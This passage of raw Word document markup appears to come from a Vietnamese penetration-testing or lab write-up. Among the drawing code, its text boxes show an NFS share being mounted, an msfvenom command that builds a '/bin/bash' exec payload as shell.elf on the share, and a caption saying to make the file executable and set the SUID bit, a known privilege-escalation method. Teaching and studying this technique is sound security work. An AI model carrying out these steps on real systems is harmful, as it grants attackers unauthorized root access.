                <wp:extent cx="4572000" cy="304800"/>
                <wp:effectExtent l="0" t="1905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04800"/>
                          <a:chOff x="1440" y="414"/>
                          <a:chExt cx="5144" cy="165"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="48" name="Freeform 287"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="413"/>
                            <a:ext cx="5144" cy="165"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6557 1440"/>
                              <a:gd name="T1" fmla="*/ T0 w 5144"/>
                              <a:gd name="T2" fmla="+- 0 579 414"/>
                              <a:gd name="T3" fmla="*/ 579 h 165"/>
                              <a:gd name="T4" fmla="+- 0 1467 1440"/>
                              <a:gd name="T5" fmla="*/ T4 w 5144"/>
                              <a:gd name="T6" fmla="+- 0 579 414"/>
                              <a:gd name="T7" fmla="*/ 579 h 165"/>
                              <a:gd name="T8" fmla="+- 0 1459 1440"/>
                              <a:gd name="T9" fmla="*/ T8 w 5144"/>
                              <a:gd name="T10" fmla="+- 0 577 414"/>
                              <a:gd name="T11" fmla="*/ 577 h 165"/>
                              <a:gd name="T12" fmla="+- 0 1442 1440"/>
                              <a:gd name="T13" fmla="*/ T12 w 5144"/>
                              <a:gd name="T14" fmla="+- 0 559 414"/>
                              <a:gd name="T15" fmla="*/ 559 h 165"/>
                              <a:gd name="T16" fmla="+- 0 1441 1440"/>
                              <a:gd name="T17" fmla="*/ T16 w 5144"/>
                              <a:gd name="T18" fmla="+- 0 556 414"/>
                              <a:gd name="T19" fmla="*/ 556 h 165"/>
                              <a:gd name="T20" fmla="+- 0 1440 1440"/>
                              <a:gd name="T21" fmla="*/ T20 w 5144"/>
                              <a:gd name="T22" fmla="+- 0 552 414"/>
                              <a:gd name="T23" fmla="*/ 552 h 165"/>
                              <a:gd name="T24" fmla="+- 0 1440 1440"/>
                              <a:gd name="T25" fmla="*/ T24 w 5144"/>
                              <a:gd name="T26" fmla="+- 0 441 414"/>
                              <a:gd name="T27" fmla="*/ 441 h 165"/>
                              <a:gd name="T28" fmla="+- 0 1441 1440"/>
                              <a:gd name="T29" fmla="*/ T28 w 5144"/>
                              <a:gd name="T30" fmla="+- 0 436 414"/>
                              <a:gd name="T31" fmla="*/ 436 h 165"/>
                              <a:gd name="T32" fmla="+- 0 1442 1440"/>
                              <a:gd name="T33" fmla="*/ T32 w 5144"/>
                              <a:gd name="T34" fmla="+- 0 433 414"/>
                              <a:gd name="T35" fmla="*/ 433 h 165"/>
                              <a:gd name="T36" fmla="+- 0 1444 1440"/>
                              <a:gd name="T37" fmla="*/ T36 w 5144"/>
                              <a:gd name="T38" fmla="+- 0 429 414"/>
                              <a:gd name="T39" fmla="*/ 429 h 165"/>
                              <a:gd name="T40" fmla="+- 0 1467 1440"/>
                              <a:gd name="T41" fmla="*/ T40 w 5144"/>
                              <a:gd name="T42" fmla="+- 0 414 414"/>
                              <a:gd name="T43" fmla="*/ 414 h 165"/>
                              <a:gd name="T44" fmla="+- 0 6557 1440"/>
                              <a:gd name="T45" fmla="*/ T44 w 5144"/>
                              <a:gd name="T46" fmla="+- 0 414 414"/>
                              <a:gd name="T47" fmla="*/ 414 h 165"/>
                              <a:gd name="T48" fmla="+- 0 6582 1440"/>
                              <a:gd name="T49" fmla="*/ T48 w 5144"/>
                              <a:gd name="T50" fmla="+- 0 433 414"/>
                              <a:gd name="T51" fmla="*/ 433 h 165"/>
                              <a:gd name="T52" fmla="+- 0 6583 1440"/>
                              <a:gd name="T53" fmla="*/ T52 w 5144"/>
                              <a:gd name="T54" fmla="+- 0 436 414"/>
                              <a:gd name="T55" fmla="*/ 436 h 165"/>
                              <a:gd name="T56" fmla="+- 0 6584 1440"/>
                              <a:gd name="T57" fmla="*/ T56 w 5144"/>
                              <a:gd name="T58" fmla="+- 0 441 414"/>
                              <a:gd name="T59" fmla="*/ 441 h 165"/>
                              <a:gd name="T60" fmla="+- 0 6584 1440"/>
                              <a:gd name="T61" fmla="*/ T60 w 5144"/>
                              <a:gd name="T62" fmla="+- 0 552 414"/>
                              <a:gd name="T63" fmla="*/ 552 h 165"/>
                              <a:gd name="T64" fmla="+- 0 6583 1440"/>
                              <a:gd name="T65" fmla="*/ T64 w 5144"/>
                              <a:gd name="T66" fmla="+- 0 556 414"/>
                              <a:gd name="T67" fmla="*/ 556 h 165"/>
                              <a:gd name="T68" fmla="+- 0 6582 1440"/>
                              <a:gd name="T69" fmla="*/ T68 w 5144"/>
                              <a:gd name="T70" fmla="+- 0 559 414"/>
                              <a:gd name="T71" fmla="*/ 559 h 165"/>
                              <a:gd name="T72" fmla="+- 0 6580 1440"/>
                              <a:gd name="T73" fmla="*/ T72 w 5144"/>
                              <a:gd name="T74" fmla="+- 0 563 414"/>
                              <a:gd name="T75" fmla="*/ 563 h 165"/>
                              <a:gd name="T76" fmla="+- 0 6578 1440"/>
                              <a:gd name="T77" fmla="*/ T76 w 5144"/>
                              <a:gd name="T78" fmla="+- 0 566 414"/>
                              <a:gd name="T79" fmla="*/ 566 h 165"/>
                              <a:gd name="T80" fmla="+- 0 6572 1440"/>
                              <a:gd name="T81" fmla="*/ T80 w 5144"/>
                              <a:gd name="T82" fmla="+- 0 572 414"/>
                              <a:gd name="T83" fmla="*/ 572 h 165"/>
                              <a:gd name="T84" fmla="+- 0 6569 1440"/>
                              <a:gd name="T85" fmla="*/ T84 w 5144"/>
                              <a:gd name="T86" fmla="+- 0 575 414"/>
                              <a:gd name="T87" fmla="*/ 575 h 165"/>
                              <a:gd name="T88" fmla="+- 0 6565 1440"/>
                              <a:gd name="T89" fmla="*/ T88 w 5144"/>
                              <a:gd name="T90" fmla="+- 0 577 414"/>
                              <a:gd name="T91" fmla="*/ 57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44" h="165">
                                <a:moveTo>
                                  <a:pt x="5117" y="165"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="27" y="165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2" y="145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4" y="15"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5117" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5142" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5143" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5144" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5144" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5143" y="142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5142" y="145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5140" y="149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5138" y="152"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5132" y="158"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5129" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5125"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88"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="413"/>
                            <a:ext cx="514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1AA3" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00BF73E0" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>msfvenom</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linux/x86/exec</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:spacing w:val="-14"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>CMD="/bin/bash</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f</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:spacing w:val="-14"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>elf</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:spacing w:val="-14"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>-o</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:spacing w:val="-14"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>/tmp/nfs/shell.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669C9" id="Group 47" o:spid="_x0000_s1053" style="position:absolute;margin-left:1in;margin-top:13pt;width:5in;height:24pt;z-index:-251569152;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1440,414" coordsize="51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">
                <v:shape id="Freeform 287" o:spid="_x0000_s1054" style="position:absolute;left:1440;top:413;width:5144;height:165;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5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" path="m5117,165l27,165r-8,-2l2,145,1,142,,138,,27,1,22,2,19,4,15,27,,5117,r25,19l5143,22r1,5l5144,138r-1,4l5142,145r-2,4l5138,152r-6,6l5129,161r-4,2l5117,165xe" fillcolor="#868278" stroked="f">
                  <v:fill opacity="9766f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5117,579;27,579;19,577;2,559;1,556;0,552;0,441;1,436;2,433;4,429;27,414;5117,414;5142,433;5143,436;5144,441;5144,552;5143,556;5142,559;5140,563;5138,566;5132,572;5129,575;5125,577" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 288" o:spid="_x0000_s1055" type="#_x0000_t202" style="position:absolute;left:1440;top:413;width:514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9951AA3" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00BF73E0" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>msfvenom</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linux/x86/exec</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:spacing w:val="-14"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>CMD="/bin/bash</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f</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:spacing w:val="-14"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>elf</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:spacing w:val="-14"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>-o</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:spacing w:val="-14"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>/tmp/nfs/shell.elf</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:position w:val="-2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25C9336B" wp14:editId="19DF5D5D">
                <wp:extent cx="3609975" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="952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61950"/>
                          <a:chOff x="0" y="-405"/>
                          <a:chExt cx="5685" cy="570"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="51" name="Freeform 12"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3093" cy="165"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 3066 w 3093"/>
                              <a:gd name="T1" fmla="*/ 165 h 165"/>
                              <a:gd name="T2" fmla="*/ 27 w 3093"/>
                              <a:gd name="T3" fmla="*/ 165 h 165"/>
                              <a:gd name="T4" fmla="*/ 19 w 3093"/>
                              <a:gd name="T5" fmla="*/ 163 h 165"/>
                              <a:gd name="T6" fmla="*/ 2 w 3093"/>
                              <a:gd name="T7" fmla="*/ 145 h 165"/>
                              <a:gd name="T8" fmla="*/ 1 w 3093"/>
                              <a:gd name="T9" fmla="*/ 142 h 165"/>
                              <a:gd name="T10" fmla="*/ 0 w 3093"/>
                              <a:gd name="T11" fmla="*/ 138 h 165"/>
                              <a:gd name="T12" fmla="*/ 0 w 3093"/>
                              <a:gd name="T13" fmla="*/ 27 h 165"/>
                              <a:gd name="T14" fmla="*/ 1 w 3093"/>
                              <a:gd name="T15" fmla="*/ 23 h 165"/>
                              <a:gd name="T16" fmla="*/ 2 w 3093"/>
                              <a:gd name="T17" fmla="*/ 20 h 165"/>
                              <a:gd name="T18" fmla="*/ 4 w 3093"/>
                              <a:gd name="T19" fmla="*/ 15 h 165"/>
                              <a:gd name="T20" fmla="*/ 27 w 3093"/>
                              <a:gd name="T21" fmla="*/ 0 h 165"/>
                              <a:gd name="T22" fmla="*/ 3066 w 3093"/>
                              <a:gd name="T23" fmla="*/ 0 h 165"/>
                              <a:gd name="T24" fmla="*/ 3090 w 3093"/>
                              <a:gd name="T25" fmla="*/ 20 h 165"/>
                              <a:gd name="T26" fmla="*/ 3092 w 3093"/>
                              <a:gd name="T27" fmla="*/ 23 h 165"/>
                              <a:gd name="T28" fmla="*/ 3093 w 3093"/>
                              <a:gd name="T29" fmla="*/ 27 h 165"/>
                              <a:gd name="T30" fmla="*/ 3093 w 3093"/>
                              <a:gd name="T31" fmla="*/ 138 h 165"/>
                              <a:gd name="T32" fmla="*/ 3092 w 3093"/>
                              <a:gd name="T33" fmla="*/ 142 h 165"/>
                              <a:gd name="T34" fmla="*/ 3090 w 3093"/>
                              <a:gd name="T35" fmla="*/ 145 h 165"/>
                              <a:gd name="T36" fmla="*/ 3089 w 3093"/>
                              <a:gd name="T37" fmla="*/ 149 h 165"/>
                              <a:gd name="T38" fmla="*/ 3086 w 3093"/>
                              <a:gd name="T39" fmla="*/ 153 h 165"/>
                              <a:gd name="T40" fmla="*/ 3081 w 3093"/>
                              <a:gd name="T41" fmla="*/ 159 h 165"/>
                              <a:gd name="T42" fmla="*/ 3077 w 3093"/>
                              <a:gd name="T43" fmla="*/ 161 h 165"/>
                              <a:gd name="T44" fmla="*/ 3073 w 3093"/>
                              <a:gd name="T45"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93" h="165">
                                <a:moveTo>
                                  <a:pt x="3066" y="165"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="27" y="165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2" y="145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="23"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4" y="15"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3066" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3090" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3092" y="23"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3093" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3093" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3092" y="142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3090" y="145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3089" y="149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3086" y="153"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3081" y="159"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3077" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3073"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3"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="-405"/>
                            <a:ext cx="56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B33" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00BF73E0" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="25C9336B" id="Group 50" o:spid="_x0000_s1056" style="width:284.25pt;height:28.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin=",-405" coordsize="56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">
                <v:shape id="Freeform 12" o:spid="_x0000_s1057" style="position:absolute;width:3093;height:165;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="309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" path="m3066,165l27,165r-8,-2l2,145,1,142,,138,,27,1,23,2,20,4,15,27,,3066,r24,20l3092,23r1,4l3093,138r-1,4l3090,145r-1,4l3086,153r-5,6l3077,161r-4,2l3066,165xe" fillcolor="#868278" stroked="f">
                  <v:fill opacity="9766f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3066,165;27,165;19,163;2,145;1,142;0,138;0,27;1,23;2,20;4,15;27,0;3066,0;3090,20;3092,23;3093,27;3093,138;3092,142;3090,145;3089,149;3086,153;3081,159;3077,161;3073,163" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 13" o:spid="_x0000_s1058" type="#_x0000_t202" style="position:absolute;top:-405;width:56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4656B33" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00BF73E0" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E42326" w14:textId="0E4C476A" w:rsidR="002D4A21" w:rsidRPr="00BF73E0" w:rsidRDefault="002D4A21" w:rsidP="00BF73E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="109" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF73E0">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tạo payload msfvenom và lưu vào mounted share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41941C58" w14:textId="77777777" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="121" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13256111" w14:textId="3B803C3F" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="121" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thêm quyền + x và đặt quyền SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C09911C" w14:textId="3FEBED95" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="164" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:position w:val="-2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00D51CAA" wp14:editId="290D8849">
                <wp:extent cx="3324225" cy="123190"/>
                <wp:effectExtent l="0" t="0" r="9525" b="1016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23190"/>
                          <a:chOff x="0" y="-510"/>
                          <a:chExt cx="5235" cy="1019"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="45" name="Freeform 9"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2000" cy="165"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 1973 w 2000"/>
                              <a:gd name="T1" fmla="*/ 165 h 165"/>
                              <a:gd name="T2" fmla="*/ 27 w 2000"/>
                              <a:gd name="T3" fmla="*/ 165 h 165"/>
                              <a:gd name="T4" fmla="*/ 19 w 2000"/>
                              <a:gd name="T5" fmla="*/ 163 h 165"/>
                              <a:gd name="T6" fmla="*/ 2 w 2000"/>
                              <a:gd name="T7" fmla="*/ 145 h 165"/>
                              <a:gd name="T8" fmla="*/ 1 w 2000"/>
                              <a:gd name="T9" fmla="*/ 142 h 165"/>
                              <a:gd name="T10" fmla="*/ 0 w 2000"/>
                              <a:gd name="T11" fmla="*/ 138 h 165"/>
                              <a:gd name="T12" fmla="*/ 0 w 2000"/>
